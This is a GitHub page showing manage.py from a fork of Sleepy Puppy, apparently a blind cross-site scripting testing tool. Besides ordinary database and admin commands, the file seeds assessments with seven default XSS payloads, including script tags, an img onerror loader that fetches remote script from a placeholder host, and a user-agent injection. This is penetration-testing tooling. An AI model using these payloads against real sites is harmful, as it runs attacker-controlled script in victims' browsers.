forked from sbehrens/sleepy-puppy
-
Notifications
You must be signed in to change notification settings - Fork 0
/
Copy pathmanage.py
120 lines (103 loc) · 3.93 KB
/
manage.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
#!/usr/bin/env python
import os
import time
import json
import sys
import getpass
from random import randint
from flask_script import Command, Option
from flask_script.commands import ShowUrls, Clean
from flask.ext.script import Manager, Server
from sleepypuppy.admin.admin.models import Admin
from sleepypuppy import app, db
manager = Manager(app)
@manager.shell
def make_shell_context():
"""
Creates a python REPL with several default imports
in the context of the app
"""
return dict(app=app)
@manager.command
def create_db():
"""
Creates a database with all of the tables defined in
your Alchemy models
"""
db.create_all()
@manager.command
def drop_db():
"""
Drops a database with all of the tables defined in
your Alchemy models
"""
db.drop_all()
@manager.command
def create_login(login):
"""
Seed the database with some inital values
"""
print 'creating admin user'
if Admin.query.filter_by(login=login).count():
print 'user already exists!'
return
else:
print "{}, enter your password!\n ".format(login)
pw1 = getpass.getpass()
pw2 = getpass.getpass(prompt="Confirm: ")
if pw1 == pw2:
admin_user = Admin(login=login, password=pw1)
print 'user: ' + login + ' created!'
else:
print 'passwords do not match!'
db.session.add(admin_user)
db.session.commit()
return
from collections import namedtuple
DefaultPayload = namedtuple('DefaultPayload', ['payload', 'url', 'method', 'parameter', 'notes'])
DEFAULT_PAYLOADS=[
DefaultPayload('<script src=$1></script>', None, 'GET', None, 'Generic'),
DefaultPayload('</script><script src=$1>', None, 'GET', None, 'Reversed'),
DefaultPayload('<script src=$1></script>', None, 'GET', None, 'Generic Encoded'),
DefaultPayload('</script><script src=$1>', None, 'GET', None, 'Generic Reversed'),
DefaultPayload('''" onload="var s=document.createElement('script');s.src='$1';document.getElementsByTagName('head')[0].appendChild(s);" garbage="''', None, 'GET', None, 'DOM Attribute Escape'),
DefaultPayload("""'"><img src=x onerror="var s=document.createElement('script');s.src='$1';document.getElementsByTagName('head')[0].appendChild(s);">""", None, 'GET', None, 'For where "<script" is banned'),
DefaultPayload("""Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36 '"><img src=x onerror="var s=document.createElement('script');s.src='$1';document.getElementsByTagName('head')[0].appendChild(s);">""", None, 'GET', None, 'Promiscuous User Agent')
]
@manager.command
def create_bootstrap_assessment(name="General", add_default_payloads=True):
"""
Creates an assessment and attaches a few default payloads.
"""
from sleepypuppy.admin.assessment.models import Assessment
from sleepypuppy.admin.payload.models import Payload
assessment = Assessment.query.filter(Assessment.name == name).first()
if assessment:
print("Assessment with name", name, "already exists.")
else:
assessment = Assessment(name=name)
if add_default_payloads:
for payload in DEFAULT_PAYLOADS:
payload = Payload(
payload=payload.payload,
url=payload.url,
method=payload.method,
parameter=payload.parameter,
notes=payload.notes
)
assessment.payloads.append(payload)
db.session.add(assessment)
db.session.commit()
@manager.command
def list_routes():
output = []
func_list = {}
for rule in app.url_map.iter_rules():
if rule.endpoint != 'static':
func_list[rule.rule] = app.view_functions[rule.endpoint].__doc__
from pprint import pprint
pprint(func_list)
if __name__ == "__main__":
manager.add_command("clean", Clean())
manager.add_command("show_urls", ShowUrls())
manager.run()